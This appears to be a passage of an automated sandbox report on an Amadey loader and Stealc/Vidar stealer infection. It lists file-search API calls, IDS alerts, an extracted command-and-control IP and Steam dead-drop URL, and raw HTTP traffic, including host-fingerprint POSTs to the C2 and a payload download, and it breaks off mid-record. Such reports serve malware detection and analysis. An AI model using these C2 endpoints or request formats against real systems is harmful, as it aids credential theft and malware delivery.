Source:	Binary string: cryptosetup.pdbGCTL source: Predicted.pif, 00000012.00000002.4067119650.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, JKJDBA.18.dr
Source:	Binary string: cryptosetup.pdb source: Predicted.pif, 00000012.00000002.4067119650.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, JKJDBA.18.dr
Source:	Binary string: softokn3.pdb@ source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Predicted.pif, 00000012.00000002.4091676163.000000002B12A000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.18.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: Predicted.pif, 00000012.00000002.4083951639.000000001F24F000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.18.dr
Source:	Binary string: nss3.pdb source: Predicted.pif, 00000012.00000002.4101354716.000000006C20F000.00000002.00000001.01000000.0000000C.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.18.dr
Source:	Binary string: mozglue.pdb source: Predicted.pif, 00000012.00000002.4100831968.000000006C04D000.00000002.00000001.01000000.0000000D.sdmp, Predicted.pif, 00000012.00000002.4081016858.00000000192D6000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.18.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: Predicted.pif, 00000012.00000002.4073968065.000000000CBD8000.00000002.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4074207582.000000000D00E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr

Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Code function: 8_2_00405B98 FindFirstFileW,FindClose,	8_2_00405B98
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Code function: 8_2_00406559 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	8_2_00406559
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Code function: 8_2_004029F1 FindFirstFileW,	8_2_004029F1
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_00264005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	18_2_00264005
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_0026494A GetFileAttributesW,FindFirstFileW,FindClose,	18_2_0026494A
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_0026C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	18_2_0026C2FF
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_0026CD14 FindFirstFileW,FindClose,	18_2_0026CD14
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_0026CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	18_2_0026CD9F
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_0026F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	18_2_0026F5D8
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_0026F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	18_2_0026F735
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_0026FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	18_2_0026FA36
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_00263CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	18_2_00263CE2

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\419591\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\419591	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49740 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49738 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49737 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.16:80 -> 192.168.2.4:49737
Source: Network traffic	Suricata IDS: 2017598 - Severity 1 - ET MALWARE Possible Kelihos.F EXE Download Common Structure : 192.168.2.4:49737 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49848 -> 195.201.118.191:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 195.201.118.191:443 -> 192.168.2.4:49853
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 195.201.118.191:443 -> 192.168.2.4:49850

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199751190313
Source: Malware configuration extractor	IPs: 185.215.113.16

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 19 Aug 2024 04:04:03 GMTContent-Type: application/octet-streamContent-Length: 972074Last-Modified: Sun, 18 Aug 2024 14:39:24 GMTConnection: keep-aliveETag: "66c2079c-ed52a"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3c ef 79 64 78 8e 17 37 78 8e 17 37 78 8e 17 37 5f 48 7a 37 7b 8e 17 37 5f 48 6c 37 69 8e 17 37 78 8e 16 37 d0 8e 17 37 71 f6 94 37 73 8e 17 37 71 f6 83 37 79 8e 17 37 71 f6 86 37 79 8e 17 37 52 69 63 68 78 8e 17 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 da 6c c0 4b 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 68 00 00 00 40 07 00 00 42 00 00 15 34 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 80 10 00 00 04 00 00 00 00 00 00 02 00 00 84 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 8a 00 00 b4 00 00 00 00 d0 0f 00 20 a6 00 00 00 00 00 00 00 00 00 00 a2 a6 0e 00 88 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1c 67 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d6 19 00 00 00 80 00 00 00 1a 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 13 07 00 00 a0 00 00 00 02 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 20 a6 00 00 00 d0 0f 00 00 a8 00 00 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: GET /profiles/76561199751190313 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: GET /inc/seo.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 31 35 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000156001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: 